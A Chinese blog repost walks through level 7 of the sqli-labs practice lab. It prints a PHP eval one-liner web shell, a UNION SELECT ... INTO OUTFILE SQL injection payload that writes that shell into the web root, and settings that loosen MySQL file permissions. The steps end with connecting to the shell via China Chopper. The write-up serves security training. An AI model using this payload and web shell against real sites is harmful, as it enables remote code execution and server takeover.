sql-lab闯关之7

Posted 随年c

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sql-lab闯关之7相关的知识,希望对你有一定的参考价值。

LESS7
知识铺垫:
1.

一句话木马有多个版本的,asp php

这里我们只用到php版本的一句话木马:

<?php @eval($_POST[“crow”]);?> 其中crow是密码

一句话木马大多配合中国菜刀使用,菜刀的使用可以参考:https://www.daixiaorui.com/read/17.html

2.
用到的两个函数:load_file()  读取本地文件  into outfile 写文件    可以百度函数用法,提示路径需要用双斜线

3.
使用phpstudy 存在文件读写权限问题
在phpstduy文件 C:\\phpstudy\\PHPTutorial\\mysql\\my.ini 下加入secure_file_priv=“/”

开始闯关

 

 提示use outfile 存在注入漏洞
输入?id=’通过观察源码我们可以发现参数格式为((‘’))


 

 然后我们通过写入文件的函数将一句话木马写入文件
输入?id=-1\')) union select 1,2,\'<?php @eval($_POST[“crow”]);?>\' into outfile "C:\\\\phpstduy2018\\\\PHPTutorial\\\\WWW\\\\sqli-labs-master\\\\Less-7\\\\test.php" --+

 

 虽然提示报错,但是打开目的文件我们发现已经存在文件test.php了,

 

 现在我们打开中国菜刀进行连接,输入我们写的文件路径,以及密码,密码就是引号中间的crow

 

 


成功进入。

 

以上是关于sql-lab闯关之7的主要内容,如果未能解决你的问题,请参考以下文章

sql注入中关于注释的一点探索

sql-lib闯关秘籍之61-65关

sql-lib闯关秘籍之51-60关

sql-lib闯关秘籍之31-40关

sql-lib闯关秘籍之41-50关

sql-labs(1~10)详细思路